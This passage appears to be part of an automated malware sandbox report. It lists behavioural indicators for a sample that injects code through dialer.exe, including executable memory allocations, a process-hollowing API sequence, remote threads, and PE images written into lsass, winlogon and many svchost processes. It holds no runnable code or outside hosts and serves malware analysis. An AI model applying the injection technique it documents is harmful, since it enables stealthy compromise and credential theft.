                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 19E29CE0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BFFC960000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1FBA3250000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 1D4C2220000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 1F2989C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BCF4530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 1B0BB950000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Recovery\WmiPrvSE.exe base: 13C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\cmd.exe base: 150E9040000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 267FCE60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\PING.EXE base: 2359B4F0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1BD70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1360000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Code function: 46_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 46_2_0000000140001C88
                                Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C0AB273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 612D273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AF19273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8799273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5377273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5D53273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 67D273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5B38273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: EBFD273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5904273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A9E7273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7316273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 130273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4E86273C
                                Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 473C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F7273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A415273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF3273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C026273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F3273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 644B273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F535273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C257273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCE273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6694273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D57273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC74273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA7273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F389273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B8273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 29CE273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C35273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC69273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7897273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 641A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60D8273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99A1273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC96273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A325273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C222273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 989C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EFAE273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39DB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4453273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2C42273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F453273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB95273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D26C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1E7C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2D9273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13C273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E904273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FCE6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9B4F273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1BD7273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 136273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E6273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66A273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5C1273C
                                Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66A273C
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x2DC293D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x2DC290E
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtQuerySystemInformation: Indirect: 0x1ED3205D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x1ED3290E
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtDeviceIoControlFile: Indirect: 0x1ED32B9D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateValueKey: Indirect: 0x1ED3293D
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtQuerySystemInformation: Indirect: 0x1ED32F57
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtResumeThread: Indirect: 0x1ED3231E
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateKey: Indirect: 0x1ED32842
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeNtEnumerateKey: Indirect: 0x1ED32875
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF190000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1300000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CE0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BFFC960000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBA3250000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D4C2220000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1F2989C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BCF4530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1B0BB950000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 value starts with: 4D5A
